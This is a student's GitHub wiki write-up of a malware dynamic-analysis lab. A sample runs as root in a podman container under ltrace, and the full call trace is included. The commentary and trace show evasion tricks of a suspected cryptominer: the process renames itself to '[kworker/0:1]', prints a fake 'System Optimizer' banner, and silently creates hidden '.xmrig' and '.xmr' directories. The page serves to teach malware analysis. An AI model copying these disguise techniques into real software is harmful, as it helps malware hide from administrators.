For350‐LTrace‐DynamicAnalysis - ConnorEast/Tech-Journal GitHub Wiki
I first had to enable SSH on my Linux analysis host and then transfer the sample into the `samples` folder. Treat the file as hostile from this point on: keep it on the isolated analysis host and only ever execute it inside the container described below.
I then ran `bash linux_malware_analysis_container.sh samples/sample1`, which starts a podman container and runs the sample inside it for dynamic analysis. Note from the trace below that the sample runs as root inside that container (`getuid() = 0`, `geteuid() = 0`), so writes to paths such as `/opt` will succeed there — the container boundary, not file permissions, is what protects the host.
I then ran ltrace against the sample inside the container. The output format below (a leading PID column, microsecond timestamps and `<…>` per-call durations) matches ltrace's `-f`, `-tt` and `-T` options, with the results written under `/tmp/ltrace_analysis/`. Reading the trace: PID 24 is the sample itself. It appears to overwrite its own `argv[0]` (the 15-byte `samples/sample1` string is zeroed and `[kworker/0:1]` copied over it) so it looks like a kernel thread in `ps`, prints a decoy "System Optimizer v2.1" banner, and then calls `system("mkdir -p /tmp/.xmrig 2>/dev/null")` followed by `system("mkdir -p /opt/.xmr 2>/dev/null")`, creating hidden directories with names associated with the XMRig Monero miner; `/tmp/.xmrig` is confirmed created by the `mkdir(".xmrig", 0777) = 0` line in PID 26. PIDs 25–28 are the `/bin/sh -c` and `mkdir` children spawned by those `system()` calls, so the bulk of the remaining lines (PATH lookups, `__ctype_b_loc`, signal setup) is ordinary shell noise rather than sample behaviour — the indicators to carry into the behavioural report are the process-name spoofing, the fake banner, the two hidden directories and the `stderr` redirection to `/dev/null`.
I then copied both the raw ltrace output and the behavioral report to my main device. I opened a terminal with Ctrl + Alt + F3 and ran the following command to copy the files out of the container (the container ID comes from `podman ps`): `podman cp [podmanID]:/tmp/ltrace_analysis/[FILENAME].txt [FileName].txt`
| Raw | Behavioral |
|---|---|
24 22:53:24.332988 strlen("samples/sample1") = 15 <0.000778>
24 22:53:24.333938 memset(0x7ffcf4dc980f, '\0', 15) = 0x7ffcf4dc980f <0.000356>
24 22:53:24.334458 strlen("[kworker/0:1]") = 13 <0.000507>
24 22:53:24.335098 strncpy(0x7ffcf4dc980f, "[kworker/0:1]", 13) = 0x7ffcf4dc980f <0.000480>
24 22:53:24.335724 puts("System Optimizer") = 17 <0.001239>
24 22:53:24.337131 printf("%s\n\n", "v2.1") = 6 <0.000937>
24 22:53:24.338232 puts("Optimizing system performance...") = 33 <0.000999>
24 22:53:24.339407 snprintf("mkdir -p /tmp/.xmrig 2>/dev/null", 1024, "mkdir -p %s 2>/dev/null", "/tmp/.xmrig") = 32 <0.000490>
24 22:53:24.340793 system("mkdir -p /tmp/.xmrig 2>/dev/null"
25 22:53:24.343363 --- Called exec() ---
25 22:53:24.363999 __errno_location() = 0x795957c026c8 <0.000363>
25 22:53:24.364573 getuid() = 0 <0.000517>
25 22:53:24.365238 getgid() = 0 <0.000387>
25 22:53:24.365750 _setjmp(0x653e6d4772e0, 0x7ffcead448e8, 0x7ffcead44910, 0x795957cf976b) = 0 <0.000408>
25 22:53:24.366339 getpid() = 25 <0.000397>
25 22:53:24.367079 sigfillset(~<31-32>) = 0 <0.000307>
25 22:53:24.367577 sigaction(SIGCHLD, { 0x653e6d46acd0, ~<31-32>, 0x57c02740, 0x795957e558d8 }, nil) = 0 <0.000521>
25 22:53:24.368323 geteuid() = 0 <0.000608>
25 22:53:24.369170 __ctype_b_loc() = 0x795957c026e0 <0.000347>
25 22:53:24.369690 __ctype_b_loc() = 0x795957c026e0 <0.000330>
25 22:53:24.370225 __ctype_b_loc() = 0x795957c026e0 <0.000329>
25 22:53:24.370721 __ctype_b_loc() = 0x795957c026e0 <0.000336>
25 22:53:24.371373 malloc(32) = 0x653e6f43e2a0 <0.000652>
25 22:53:24.372204 __ctype_b_loc() = 0x795957c026e0 <0.000360>
25 22:53:24.372719 __ctype_b_loc() = 0x795957c026e0 <0.000350>
25 22:53:24.373238 __ctype_b_loc() = 0x795957c026e0 <0.000360>
25 22:53:24.373754 __ctype_b_loc() = 0x795957c026e0 <0.000332>
25 22:53:24.374323 __ctype_b_loc() = 0x795957c026e0 <0.000371>
25 22:53:24.374896 __ctype_b_loc() = 0x795957c026e0 <0.000297>
25 22:53:24.375348 __ctype_b_loc() = 0x795957c026e0 <0.000396>
25 22:53:24.375942 __ctype_b_loc() = 0x795957c026e0 <0.000294>
25 22:53:24.376384 __ctype_b_loc() = 0x795957c026e0 <0.000372>
25 22:53:24.376956 __ctype_b_loc() = 0x795957c026e0 <0.000298>
25 22:53:24.377405 malloc(32) = 0x653e6f43e2d0 <0.000402>
25 22:53:24.377968 __ctype_b_loc() = 0x795957c026e0 <0.000296>
25 22:53:24.378410 __ctype_b_loc() = 0x795957c026e0 <0.000410>
25 22:53:24.378988 __ctype_b_loc() = 0x795957c026e0 <0.000297>
25 22:53:24.379431 __ctype_b_loc() = 0x795957c026e0 <0.000396>
25 22:53:24.380045 __ctype_b_loc() = 0x795957c026e0 <0.000303>
25 22:53:24.380528 malloc(32) = 0x653e6f43e300 <0.000363>
25 22:53:24.381051 __ctype_b_loc() = 0x795957c026e0 <0.000297>
25 22:53:24.381540 __ctype_b_loc() = 0x795957c026e0 <0.000365>
25 22:53:24.382075 __ctype_b_loc() = 0x795957c026e0 <0.000293>
25 22:53:24.382545 __ctype_b_loc() = 0x795957c026e0 <0.000354>
25 22:53:24.383078 __ctype_b_loc() = 0x795957c026e0 <0.000299>
25 22:53:24.383555 __ctype_b_loc() = 0x795957c026e0 <0.000334>
25 22:53:24.384087 __ctype_b_loc() = 0x795957c026e0 <0.000301>
25 22:53:24.384567 __ctype_b_loc() = 0x795957c026e0 <0.000324>
25 22:53:24.385090 __ctype_b_loc() = 0x795957c026e0 <0.000306>
25 22:53:24.385580 malloc(32) = 0x653e6f43e330 <0.000328>
25 22:53:24.386086 __ctype_b_loc() = 0x795957c026e0 <0.000316>
25 22:53:24.386580 __ctype_b_loc() = 0x795957c026e0 <0.000319>
25 22:53:24.387060 __ctype_b_loc() = 0x795957c026e0 <0.000342>
25 22:53:24.387579 __ctype_b_loc() = 0x795957c026e0 <0.000327>
25 22:53:24.388064 __ctype_b_loc() = 0x795957c026e0 <0.000482>
25 22:53:24.388799 malloc(32) = 0x653e6f43e360 <0.000849>
25 22:53:24.389901 __ctype_b_loc() = 0x795957c026e0 <0.000314>
25 22:53:24.390424 __ctype_b_loc() = 0x795957c026e0 <0.000333>
25 22:53:24.390950 __ctype_b_loc() = 0x795957c026e0 <0.000297>
25 22:53:24.391429 __ctype_b_loc() = 0x795957c026e0 <0.000337>
25 22:53:24.391957 __ctype_b_loc() = 0x795957c026e0 <0.000291>
25 22:53:24.392403 __ctype_b_loc() = 0x795957c026e0 <0.000356>
25 22:53:24.392952 malloc(32) = 0x653e6f43e390 <0.000291>
25 22:53:24.393385 __ctype_b_loc() = 0x795957c026e0 <0.000376>
25 22:53:24.393950 __ctype_b_loc() = 0x795957c026e0 <0.000295>
25 22:53:24.394394 __ctype_b_loc() = 0x795957c026e0 <0.000402>
25 22:53:24.394964 __ctype_b_loc() = 0x795957c026e0 <0.000296>
25 22:53:24.395407 __ctype_b_loc() = 0x795957c026e0 <0.000426>
25 22:53:24.396002 strchrnul(0x7ffcead46f7d, 61, 5, 61) = 0x7ffcead46f81 <0.000322>
25 22:53:24.396546 strchr("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" <0.001039>
25 22:53:24.398279 strchr("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/sbin:/usr/bin:/sbin:/bin" <0.000854>
25 22:53:24.399626 strchr("/usr/sbin:/usr/bin:/sbin:/bin", ':') = ":/usr/bin:/sbin:/bin" <0.000682>
25 22:53:24.400695 strchr("/usr/bin:/sbin:/bin", ':') = ":/sbin:/bin" <0.000587>
25 22:53:24.401580 strchr("/sbin:/bin", ':') = ":/bin" <0.000495>
25 22:53:24.402317 strchr("/bin", ':') = nil <0.000384>
25 22:53:24.402876 __ctype_b_loc() = 0x795957c026e0 <0.000349>
25 22:53:24.403393 __ctype_b_loc() = 0x795957c026e0 <0.000326>
25 22:53:24.403911 __ctype_b_loc() = 0x795957c026e0 <0.000340>
25 22:53:24.404407 __ctype_b_loc() = 0x795957c026e0 <0.000324>
25 22:53:24.404923 __ctype_b_loc() = 0x795957c026e0 <0.000328>
25 22:53:24.405474 __ctype_b_loc() = 0x795957c026e0 <0.000372>
25 22:53:24.406012 __ctype_b_loc() = 0x795957c026e0 <0.000344>
25 22:53:24.406545 __ctype_b_loc() = 0x795957c026e0 <0.000328>
25 22:53:24.407037 __ctype_b_loc() = 0x795957c026e0 <0.000317>
25 22:53:24.407556 __ctype_b_loc() = 0x795957c026e0 <0.000329>
25 22:53:24.408045 __ctype_b_loc() = 0x795957c026e0 <0.000299>
25 22:53:24.408559 __ctype_b_loc() = 0x795957c026e0 <0.000335>
25 22:53:24.409056 __ctype_b_loc() = 0x795957c026e0 <0.000296>
25 22:53:24.409563 __ctype_b_loc() = 0x795957c026e0 <0.000341>
25 22:53:24.410064 __ctype_b_loc() = 0x795957c026e0 <0.000293>
25 22:53:24.410563 malloc(32) = 0x653e6f43e3c0 <0.000347>
25 22:53:24.411061 __ctype_b_loc() = 0x795957c026e0 <0.000292>
25 22:53:24.411535 malloc(32) = 0x653e6f43e3f0 <0.000385>
25 22:53:24.412075 strchrnul(0x653e6d477020, 61, 7, 61) = 0x653e6d477026 <0.000314>
25 22:53:24.412619 __errno_location() = 0x795957c026c8 <0.000378>
25 22:53:24.413159 __isoc23_strtoimax(0x653e6d477027, 0x7ffcead44570, 10, 61) = 1 <0.000365>
25 22:53:24.413678 __ctype_b_loc() = 0x795957c026e0 <0.000363>
25 22:53:24.414209 getppid() = 24 <0.000385>
25 22:53:24.414746 __vsnprintf_chk(0x653e6d477205, 27, 2, -1) = 2 <0.000431>
25 22:53:24.415346 malloc(32) = 0x653e6f43e420 <0.000330>
25 22:53:24.415865 strchrnul(0x7ffcead46827, 61, 4, 0) = 0x7ffcead4682a <0.000343>
25 22:53:24.416372 stat64(0x7ffcead4682b, 0x7ffcead446a0, 4, 0) = 0 <0.000483>
25 22:53:24.417062 stat64(0x653e6d47024f, 0x7ffcead44610, 0x7ffcead446a0, 0x795957d1c3ee) = 0 <0.000430>
25 22:53:24.417686 strdup("/home/app") = 0x653e6f43e450 <0.000491>
25 22:53:24.418336 __ctype_b_loc() = 0x795957c026e0 <0.000336>
25 22:53:24.418855 __ctype_b_loc() = 0x795957c026e0 <0.000350>
25 22:53:24.419373 __ctype_b_loc() = 0x795957c026e0 <0.000331>
25 22:53:24.419886 strchrnul(0x653e6d470194, 61, 0x795957db78c0, 0x70612f656d6f682f) = 0x653e6d470194 <0.000363>
25 22:53:24.420414 strlen("/home/app") = 9 <0.000465>
25 22:53:24.421054 malloc(14) = 0x653e6f43e470 <0.000375>
25 22:53:24.421628 __mempcpy_chk(0x653e6f43e470, 0x653e6d470191, 3, 14) = 0x653e6f43e473 <0.000351>
25 22:53:24.422145 mempcpy(0x653e6f43e474, 0x653e6f43e450, 9, 80) = 0x653e6f43e47d <0.000396>
25 22:53:24.422755 geteuid() = 0 <0.000385>
25 22:53:24.423311 getegid() = 0 <0.000413>
25 22:53:24.423888 sigaction(SIGINT, nil, { 0, <>, 0xe, 0x1ead4682b }) = 0 <0.000390>
25 22:53:24.424586 sigfillset(~<31-32>) = 0 <0.000325>
25 22:53:24.425083 sigaction(SIGINT, { 0x653e6d46acd0, ~<31-32>, 0xe, 0x1ead4682b }, nil) = 0 <0.000521>
25 22:53:24.425766 sigaction(SIGQUIT, nil, { 0, <>, 0xe, 0x1ead4682b }) = 0 <0.000410>
25 22:53:24.426507 sigfillset(~<31-32>) = 0 <0.000388>
25 22:53:24.427068 sigaction(SIGQUIT, { 0, ~<31-32>, 0xe, 0x1ead4682b }, nil) = 0 <0.000449>
25 22:53:24.427715 sigaction(SIGTERM, nil, { 0, <>, 0xe, 0x1ead4682b }) = 0 <0.000416>
25 22:53:24.428362 sigfillset(~<31-32>) = 0 <0.000369>
25 22:53:24.428942 sigaction(SIGTERM, { 0, ~<31-32>, 0xe, 0x1ead4682b }, nil) = 0 <0.000417>
25 22:53:24.429593 strlen("mkdir -p /tmp/.xmrig 2>/dev/null") = 32 <0.000704>
25 22:53:24.430466 memcpy(0x653e6d4774a8, "mkdir -p /tmp/.xmrig 2>/dev/null\0", 33) = 0x653e6d4774a8 <0.000676>
25 22:53:24.431312 malloc(136) = 0x653e6f43e490 <0.000331>
25 22:53:24.431844 strlen("mkdir -p /tmp/.xmrig 2>/dev/null") = 32 <0.000679>
25 22:53:24.432702 strcmp("mkdir", "for") = 7 <0.000489>
25 22:53:24.433347 strcmp("mkdir", "until") = -8 <0.000478>
25 22:53:24.434010 strcmp("mkdir", "in") = 4 <0.000404>
25 22:53:24.434586 strcmp("mkdir", "then") = -7 <0.000463>
25 22:53:24.435224 __ctype_b_loc() = 0x795957c026e0 <0.000325>
25 22:53:24.435700 __ctype_b_loc() = 0x795957c026e0 <0.000326>
25 22:53:24.436229 __ctype_b_loc() = 0x795957c026e0 <0.000322>
25 22:53:24.436833 __ctype_b_loc() = 0x795957c026e0 <0.000493>
25 22:53:24.437422 __ctype_b_loc() = 0x795957c026e0 <0.000333>
25 22:53:24.438032 strcspn("mkdir", "\210\203\201\202\204\206\207") = 5 <0.000526>
25 22:53:24.438706 mempcpy(0x653e6d4775c8, 0x653e6d4774d0, 6, 6) = 0x653e6d4775ce <0.000349>
25 22:53:24.439270 strpbrk(0x653e6d4775c8, 0x653e6d471f7c, 0x653e6d4773d0, 0x653e6d4773d0) = 0 <0.000388>
25 22:53:24.439852 strpbrk(0x653e6d4775c8, 0x653e6d4718e2, 8, 5) = 0 <0.000318>
25 22:53:24.440374 strchr("mkdir", '/') = nil <0.000454>
25 22:53:24.440982 strcmp("mkdir", "jobs") = 3 <0.000424>
25 22:53:24.441620 strcmp("mkdir", "test") = -7 <0.000441>
25 22:53:24.442217 strcmp("mkdir", "read") = -5 <0.000487>
25 22:53:24.442882 strcmp("mkdir", "printf") = -3 <0.000424>
25 22:53:24.443484 strcmp("mkdir", "local") = 1 <0.000501>
25 22:53:24.444140 strcspn("-p", "\210\203\201\202\204\206\207") = 2 <0.000447>
25 22:53:24.444764 mempcpy(0x653e6d4775e0, 0x653e6d4774f8, 3, 3) = 0x653e6d4775e3 <0.000356>
25 22:53:24.445286 strpbrk(0x653e6d4775e0, 0x653e6d471f7c, 0x653e6d4773d0, 0x653e6d4773d0) = 0 <0.000356>
25 22:53:24.445873 strpbrk(0x653e6d4775e0, 0x653e6d4718e2, 1, 16) = 0 <0.000323>
25 22:53:24.446362 strcspn("/tmp/.xmrig", "\210\203\201\202\204\206\207") = 11 <0.000615>
25 22:53:24.447131 mempcpy(0x653e6d4775f8, 0x653e6d477520, 12, 12) = 0x653e6d477604 <0.000346>
25 22:53:24.447636 strpbrk(0x653e6d4775f8, 0x653e6d471f7c, 0x653e6d4773d0, 0x653e6d4773d0) = 0 <0.000397>
25 22:53:24.448201 strpbrk(0x653e6d4775f8, 0x653e6d4718e2, 1, 16) = 0 <0.000346>
25 22:53:24.448713 malloc(16) = 0x653e6f43e520 <0.000383>
25 22:53:24.449256 strcspn("/dev/null", "\210\203\201\202\204\206\207") = 9 <0.000509>
25 22:53:24.449987 mempcpy(0x653e6d477640, 0x653e6d477578, 10, 10) = 0x653e6d47764a <0.000324>
25 22:53:24.450492 malloc(48) = 0x653e6f43e540 <0.000335>
25 22:53:24.451063 _setjmp(0x7ffcead44490, 3, 0xfffffffefffffffe, 0x653e6f43e570) = 0 <0.000332>
25 22:53:24.451584 open64("/dev/null", 577, 0666) = 3 <0.000619>
25 22:53:24.452419 fcntl(2, 0, 10, 2) = 10 <0.000457>
25 22:53:24.453042 close(2) = 0 <0.000442>
25 22:53:24.453629 fcntl(10, 2, 1, 0x795957d1b724) = 0 <0.000417>
25 22:53:24.454248 dup2(3, 2) = 2 <0.000401>
25 22:53:24.454818 close(3) = 0 <0.000358>
25 22:53:24.455362 strchr("mkdir", '/') = nil <0.000405>
25 22:53:24.455957 strcmp("mkdir", "jobs") = 3 <0.000450>
25 22:53:24.456585 strcmp("mkdir", "test") = -7 <0.000441>
25 22:53:24.457179 strcmp("mkdir", "read") = -5 <0.000489>
25 22:53:24.457844 strcmp("mkdir", "printf") = -3 <0.000423>
25 22:53:24.458463 strcmp("mkdir", "local") = 1 <0.000474>
25 22:53:24.459089 strcspn("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 15 <0.001043>
25 22:53:24.460285 strlen("mkdir") = 5 <0.000513>
25 22:53:24.460959 mempcpy(0x653e6d477660, 0x7ffcead46f82, 15, 1480) = 0x653e6d47766f <0.000314>
25 22:53:24.461426 strcpy(0x653e6d477670, "mkdir") = 0x653e6d477670 <0.000485>
25 22:53:24.462064 stat64(0x653e6d477660, 0x7ffcead444a0, 0x653e6d477675, 0) = 0xffffffff <0.000433>
25 22:53:24.462661 strcspn("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 14 <0.000876>
25 22:53:24.463691 strlen("mkdir") = 5 <0.000431>
25 22:53:24.464273 mempcpy(0x653e6d477660, 0x7ffcead46f92, 14, 1480) = 0x653e6d47766e <0.000345>
25 22:53:24.464814 strcpy(0x653e6d47766f, "mkdir") = 0x653e6d47766f <0.000389>
25 22:53:24.465357 stat64(0x653e6d477660, 0x7ffcead444a0, 0x653e6d477674, 0) = 0xffffffff <0.000453>
25 22:53:24.466015 strcspn("/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 9 <0.000665>
25 22:53:24.466853 strlen("mkdir") = 5 <0.000399>
25 22:53:24.467406 mempcpy(0x653e6d477660, 0x7ffcead46fa1, 9, 1480) = 0x653e6d477669 <0.000344>
25 22:53:24.467995 strcpy(0x653e6d47766a, "mkdir") = 0x653e6d47766a <0.000474>
25 22:53:24.468680 stat64(0x653e6d477660, 0x7ffcead444a0, 0x653e6d47766f, 0) = 0xffffffff <0.000447>
25 22:53:24.469289 strcspn("/usr/bin:/sbin:/bin", "%:") = 8 <0.000586>
25 22:53:24.470028 strlen("mkdir") = 5 <0.000350>
25 22:53:24.470567 mempcpy(0x653e6d477660, 0x7ffcead46fab, 8, 1480) = 0x653e6d477668 <0.000344>
25 22:53:24.471069 strcpy(0x653e6d477669, "mkdir") = 0x653e6d477669 <0.000362>
25 22:53:24.471610 stat64(0x653e6d477660, 0x7ffcead444a0, 0x653e6d47766e, 0) = 0 <0.000429>
25 22:53:24.472203 strlen("mkdir") = 5 <0.000366>
25 22:53:24.472710 malloc(29) = 0x653e6f43e580 <0.000322>
25 22:53:24.473181 __strcpy_chk(0x653e6f43e593, 0x653e6d4775c8, 10, 0x653e6f43e5a0) = 0x653e6f43e593 <0.000336>
25 22:53:24.473670 realloc(0, 160) = 0x653e6f43e5b0 <0.000334>
25 22:53:24.474158 sigfillset(~<31-32>) = 0 <0.000315>
25 22:53:24.474630 sigprocmask(SIG_UNBLOCK, ~<31-32>, nil) = 0 <0.000448>
25 22:53:24.475243 vfork(2, 0x7ffcead444d0, 0, 0x795957ca8f48
26 22:53:24.476488 <... vfork resumed> ) = 0 <0.001150>
26 22:53:24.476739 sigsetmask(0, 0, 0, 0x795957d1574c) = 0x7ffbfeef <0.000884>
26 22:53:24.477971 malloc(512) = 0x653e6f43e660 <0.000519>
26 22:53:24.478745 memcpy(0x653e6f43e668, "uo\324\352\374\177\0\0Fh\324\352\374\177\0\05h\324\352\374\177\0\0\336o\324\352\374\177\0\0jo\324\352\374\177\0\0}o\324\352\374\177\0\0Qh\324\352\374\177\0\0\277o\324\352\374\177\0\0", 64) = 0x653e6f43e668 <0.000953>
26 22:53:24.479954 strchr("mkdir", '/') = nil <0.000579>
26 22:53:24.480800 strcspn("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 15 <0.001295>
26 22:53:24.482323 strlen("mkdir") = 5 <0.000706>
26 22:53:24.483234 mempcpy(0x653e6f43e6b8, 0x7ffcead46f82, 15, 1480) = 0x653e6f43e6c7 <0.000719>
26 22:53:24.484245 strcpy(0x653e6f43e6c8, "mkdir") = 0x653e6f43e6c8 <0.000708>
26 22:53:24.485162 strcspn("/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 14 <0.001148>
26 22:53:24.486631 strlen("mkdir") = 5 <0.000602>
26 22:53:24.487517 mempcpy(0x653e6f43e6b8, 0x7ffcead46f92, 14, 1480) = 0x653e6f43e6c6 <0.000592>
26 22:53:24.488351 strcpy(0x653e6f43e6c7, "mkdir") = 0x653e6f43e6c7 <0.000883>
26 22:53:24.489521 strcspn("/usr/sbin:/usr/bin:/sbin:/bin", "%:") = 9 <0.000999>
26 22:53:24.490726 strlen("mkdir") = 5 <0.000607>
26 22:53:24.491633 mempcpy(0x653e6f43e6b8, 0x7ffcead46fa1, 9, 1480) = 0x653e6f43e6c1 <0.000560>
26 22:53:24.492407 strcpy(0x653e6f43e6c2, "mkdir") = 0x653e6f43e6c2 <0.000572>
26 22:53:24.493185 strcspn("/usr/bin:/sbin:/bin", "%:") = 8 <0.000759>
26 22:53:24.494259 strlen("mkdir") = 5 <0.000690>
26 22:53:24.495151 mempcpy(0x653e6f43e6b8, 0x7ffcead46fab, 8, 1480) = 0x653e6f43e6c0 <0.000552>
26 22:53:24.496027 strcpy(0x653e6f43e6c1, "mkdir") = 0x653e6f43e6c1 <0.000678>
26 22:53:24.497015 execve(0x653e6f43e6b8, 0x653e6d477620, 0x653e6f43e668, 0
26 22:53:24.498282 --- Called exec() ---
25 22:53:24.500378 <... vfork resumed> ) = 26 <0.025109>
25 22:53:24.500704 sigsetmask(0, 0, 0, 0x795957d1574c) = 0x7ffbfeef <0.000534>
25 22:53:24.501545 wait3(0x7ffcead443fc, 0, 0, 0
26 22:53:24.538073 strrchr("mkdir", '/') = nil <0.000743>
26 22:53:24.539040 setlocale(LC_ALL, "") = "C" <0.000609>
26 22:53:24.540067 bindtextdomain("coreutils", "/usr/share/locale") = "/usr/share/locale" <0.000899>
26 22:53:24.541558 textdomain("coreutils") = "coreutils" <0.000712>
26 22:53:24.542692 __cxa_atexit(0x57a82d633550, 0, 0x57a82d638008, 0) = 0 <0.000510>
26 22:53:24.543490 getopt_long(3, 0x7ffcc422dd78, "pm:vZ", 0x57a82d6379a0, nil) = 112 <0.000579>
26 22:53:24.544349 getopt_long(3, 0x7ffcc422dd78, "pm:vZ", 0x57a82d6379a0, nil) = -1 <0.000588>
26 22:53:24.545289 umask(00) = 022 <0.000638>
26 22:53:24.546215 umask(022) = 00 <0.000636>
26 22:53:24.547136 mkdir("/tmp", 0777) = -1 <0.000753>
26 22:53:24.548212 __errno_location() = 0x74d178ba36a0 <0.000496>
26 22:53:24.548967 chdir("/tmp") = 0 <0.000713>
26 22:53:24.551216 mkdir(".xmrig", 0777) = 0 <0.001390>
26 22:53:24.552845 __fpending(0x74d178e445c0, 0, 1, 1) = 0 <0.000457>
26 22:53:24.553625 fileno(0x74d178e445c0) = 1 <0.000502>
26 22:53:24.554386 __freading(0x74d178e445c0, 0, 1, 1) = 0 <0.000502>
26 22:53:24.555156 __freading(0x74d178e445c0, 0, 0, 1) = 0 <0.000446>
26 22:53:24.555845 fflush(0x74d178e445c0) = 0 <0.000419>
26 22:53:24.556544 fclose(0x74d178e445c0) = 0 <0.000621>
26 22:53:24.557426 __fpending(0x74d178e444e0, 0, 0x74d178e41e00, 0) = 0 <0.000595>
26 22:53:24.558307 fileno(0x74d178e444e0) = 2 <0.000551>
26 22:53:24.559138 __freading(0x74d178e444e0, 0, 0x74d178e41e00, 0) = 0 <0.000479>
26 22:53:24.559921 __freading(0x74d178e444e0, 0, 0, 0) = 0 <0.000519>
26 22:53:24.560749 fflush(0x74d178e444e0) = 0 <0.000584>
26 22:53:24.561639 fclose(0x74d178e444e0) = 0 <0.000721>
26 22:53:24.563176 +++ exited (status 0) +++
25 22:53:24.563479 --- SIGCHLD (Child exited) ---
25 22:53:24.563680 <... wait3 resumed> ) = 26 <0.062112>
25 22:53:24.563879 wait3(0x7ffcead443fc, 1, 0, 0) = 0xffffffff <0.000455>
25 22:53:24.564536 dup2(10, 2) = 2 <0.000434>
25 22:53:24.565155 close(10) = 0 <0.000399>
25 22:53:24.565689 free(0x653e6f43e540) = <0.000333>
25 22:53:24.566216 free(0x653e6f43e520) = <0.000323>
25 22:53:24.566683 free(0x653e6f43e660) = <0.000347>
25 22:53:24.567214 free(0x653e6f43e490) = <0.000338>
25 22:53:24.567698 _setjmp(0x7ffcead44680, 0x653e6f43e480, 0x653e6f43e, 0x653e6d4774a8) = 0 <0.000354>
25 22:53:24.568236 _setjmp(0x7ffcead44680, 0, 0x86f3e8153b8a645d, 0x653e6d4774a8) = 0 <0.000513>
25 22:53:24.568958 _exit(0
25 22:53:24.569657 +++ exited (status 0) +++
24 22:53:24.570030 --- SIGCHLD (Child exited) ---
24 22:53:24.570149 <... system resumed> ) = 0 <0.229366>
24 22:53:24.570290 snprintf("mkdir -p /opt/.xmr 2>/dev/null", 1024, "mkdir -p %s 2>/dev/null", "/opt/.xmr") = 30 <0.000546>
24 22:53:24.571761 system("mkdir -p /opt/.xmr 2>/dev/null"
27 22:53:24.574846 --- Called exec() ---
27 22:53:24.593888 __errno_location() = 0x7d31077f36c8 <0.000328>
27 22:53:24.594423 getuid() = 0 <0.000730>
27 22:53:24.595352 getgid() = 0 <0.000387>
27 22:53:24.595923 _setjmp(0x5b4e124a82e0, 0x7ffc2f6b2938, 0x7ffc2f6b2960, 0x7d31078ea76b) = 0 <0.000307>
27 22:53:24.596377 getpid() = 27 <0.000362>
27 22:53:24.596959 sigfillset(~<31-32>) = 0 <0.000286>
27 22:53:24.597401 sigaction(SIGCHLD, { 0x5b4e1249bcd0, ~<31-32>, 0x77f3740, 0x7d3107a468d8 }, nil) = 0 <0.000471>
27 22:53:24.598051 geteuid() = 0 <0.000348>
27 22:53:24.598568 __ctype_b_loc() = 0x7d31077f36e0 <0.000312>
27 22:53:24.599053 __ctype_b_loc() = 0x7d31077f36e0 <0.000282>
27 22:53:24.599505 __ctype_b_loc() = 0x7d31077f36e0 <0.000313>
27 22:53:24.599978 __ctype_b_loc() = 0x7d31077f36e0 <0.000284>
27 22:53:24.600420 malloc(32) = 0x5b4e140a92a0 <0.000641>
27 22:53:24.601214 __ctype_b_loc() = 0x7d31077f36e0 <0.000313>
27 22:53:24.601675 __ctype_b_loc() = 0x7d31077f36e0 <0.000323>
27 22:53:24.602153 __ctype_b_loc() = 0x7d31077f36e0 <0.000285>
27 22:53:24.602600 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.603064 __ctype_b_loc() = 0x7d31077f36e0 <0.000282>
27 22:53:24.603512 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.603977 __ctype_b_loc() = 0x7d31077f36e0 <0.000285>
27 22:53:24.604407 __ctype_b_loc() = 0x7d31077f36e0 <0.000300>
27 22:53:24.604876 __ctype_b_loc() = 0x7d31077f36e0 <0.000284>
27 22:53:24.605308 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.605763 malloc(32) = 0x5b4e140a92d0 <0.000305>
27 22:53:24.606215 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.606661 __ctype_b_loc() = 0x7d31077f36e0 <0.000319>
27 22:53:24.607135 __ctype_b_loc() = 0x7d31077f36e0 <0.000279>
27 22:53:24.607580 __ctype_b_loc() = 0x7d31077f36e0 <0.000308>
27 22:53:24.608098 __ctype_b_loc() = 0x7d31077f36e0 <0.000295>
27 22:53:24.608639 malloc(32) = 0x5b4e140a9300 <0.000340>
27 22:53:24.609130 __ctype_b_loc() = 0x7d31077f36e0 <0.000284>
27 22:53:24.609582 __ctype_b_loc() = 0x7d31077f36e0 <0.000315>
27 22:53:24.610050 __ctype_b_loc() = 0x7d31077f36e0 <0.000282>
27 22:53:24.610501 __ctype_b_loc() = 0x7d31077f36e0 <0.000306>
27 22:53:24.610963 __ctype_b_loc() = 0x7d31077f36e0 <0.000280>
27 22:53:24.611388 __ctype_b_loc() = 0x7d31077f36e0 <0.000303>
27 22:53:24.611865 __ctype_b_loc() = 0x7d31077f36e0 <0.000281>
27 22:53:24.612298 __ctype_b_loc() = 0x7d31077f36e0 <0.000303>
27 22:53:24.612796 __ctype_b_loc() = 0x7d31077f36e0 <0.000314>
27 22:53:24.613238 malloc(32) = 0x5b4e140a9330 <0.000297>
27 22:53:24.613674 __ctype_b_loc() = 0x7d31077f36e0 <0.000320>
27 22:53:24.614149 __ctype_b_loc() = 0x7d31077f36e0 <0.000281>
27 22:53:24.614594 __ctype_b_loc() = 0x7d31077f36e0 <0.000305>
27 22:53:24.615054 __ctype_b_loc() = 0x7d31077f36e0 <0.000280>
27 22:53:24.615499 __ctype_b_loc() = 0x7d31077f36e0 <0.000310>
27 22:53:24.615967 malloc(32) = 0x5b4e140a9360 <0.000279>
27 22:53:24.616383 __ctype_b_loc() = 0x7d31077f36e0 <0.000299>
27 22:53:24.616851 __ctype_b_loc() = 0x7d31077f36e0 <0.000281>
27 22:53:24.617286 __ctype_b_loc() = 0x7d31077f36e0 <0.000301>
27 22:53:24.617731 __ctype_b_loc() = 0x7d31077f36e0 <0.000309>
27 22:53:24.618193 __ctype_b_loc() = 0x7d31077f36e0 <0.000302>
27 22:53:24.618640 __ctype_b_loc() = 0x7d31077f36e0 <0.000310>
27 22:53:24.619105 malloc(32) = 0x5b4e140a9390 <0.000277>
